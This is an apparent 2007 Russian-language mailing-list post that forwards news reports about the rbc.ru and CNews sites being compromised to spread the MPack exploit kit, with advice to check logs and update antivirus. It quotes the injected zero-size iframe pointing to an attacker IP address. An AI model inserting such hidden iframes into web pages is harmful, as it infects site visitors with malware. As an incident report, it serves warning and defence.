Thread-topic: FYI: CNews предупреждает: обновите антив ирусные базы - продолжение
Рекомендуется проверить логи на предмет соединений с 81.95.150.42. И снова
Mpack (вот и в отчете Finjan об уклончивых атаках о нем писали)...
----------------------
http://www.securitylab.ru/news/297274.php
Сегодня утром многие пользователи, зашедшие на сайт rbc.ru увидели
предупреждение антивируса о попытке заражения троянской программой.
При детальном анализе оказалось, что на главной странице сайта содержался код
<iframe src="http://81.95.150.42/MPack091cbt/index.php" width=0
height=0></iframe> ,
загружающий на компьютер пользователя программу Mpack, которая используется для
загрузки вредоносного ПО на удаленные компьютеры за счет эксплуатации
многочисленных уязвимостей.
За небольшой промежуток времени, пока висел троян, риску заражения подверглись
несколько десятков тысяч пользователей сайта.
----------------------
http://www.cnews.ru/news/top/index.shtml?2007/06/07/253954
В последнее время в Рунете заметно участились атаки хакеров, внедряющих
специальный вредоносный код на ПК пользователей. Цель злоумышленников -
формирование из инфицированных машин ботнета: сети компьютеров, подчиняющихся
чужим командам.
CNews подвергся атаке хакеров, направленной против посетителей портала. Целью
атаки было внедрить на компьютеры посетителей вредоносный код, позволяющий
злоумышленникам управлять по сети зараженными машинами. Технические специалисты
CNews отразили атаку.
Однако, ввиду высокой посещаемости портала, некоторые пользователи, не
обновляющие антивирусные программы и не устанавливающие на операционную систему
необходимые обновления, могли позволить хакерам завладеть управлением над
своими компьютерами, загрузив вредоносный код с первой страницы РБК, на которой
транслируется блок публикаций CNews.
Для того, чтобы обезопасить свои компьютеры от атак злоумышленников и не
допустить их заражения, необходимо установить последние обновления используемой
операционной системы и антивирусных программ.